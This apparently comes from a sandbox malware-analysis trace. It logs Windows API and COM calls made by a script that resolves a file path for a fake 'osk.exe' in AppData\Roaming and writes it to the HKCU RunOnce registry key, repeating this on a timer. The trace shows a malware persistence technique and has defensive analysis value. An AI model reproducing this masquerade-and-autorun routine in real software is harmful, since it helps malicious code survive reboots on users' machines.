riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.925] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0080.925] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.925] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1b [0080.925] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.926] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1a [0080.926] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.926] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.926] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.926] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.926] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.926] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0080.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.927] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.927] RegCloseKey (hKey=0x280) returned 0x0 [0080.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.927] SetTimer (hWnd=0x20280, nIDEvent=0x2096, uElapse=0xa, lpTimerFunc=0x0) returned 0x2096 [0080.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.938] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.938] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.938] KillTimer (hWnd=0x20280, uIDEvent=0x2096) returned 1 [0080.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.939] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.939] IUnknown:Release (This=0x787518) returned 0x1 [0080.939] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0080.939] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.939] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.939] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.939] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.939] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0080.940] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.940] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1c [0080.940] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.940] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0080.941] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.941] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.941] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.941] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.941] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.941] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.941] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.941] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.942] RegCloseKey (hKey=0x280) returned 0x0 [0080.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.942] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.942] SetTimer (hWnd=0x20280, nIDEvent=0x2097, uElapse=0xa, lpTimerFunc=0x0) returned 0x2097 [0080.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.954] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.954] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.954] KillTimer (hWnd=0x20280, uIDEvent=0x2097) returned 1 [0080.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.955] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.955] IUnknown:Release (This=0x787518) returned 0x1 [0080.955] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.955] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.955] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.955] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.955] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.956] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.956] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0080.956] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.956] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1d [0080.956] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.957] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c 
[0080.957] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.957] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.957] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.957] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.957] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.957] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.957] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.957] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.958] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.958] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.958] RegCloseKey (hKey=0x280) returned 0x0 [0080.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.958] SetTimer (hWnd=0x20280, nIDEvent=0x2098, uElapse=0xa, lpTimerFunc=0x0) returned 0x2098 [0080.958] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.970] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.970] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.970] KillTimer (hWnd=0x20280, uIDEvent=0x2098) returned 1 [0080.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.970] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.970] IUnknown:Release (This=0x787518) returned 0x1 [0080.970] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.970] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.970] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.971] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), 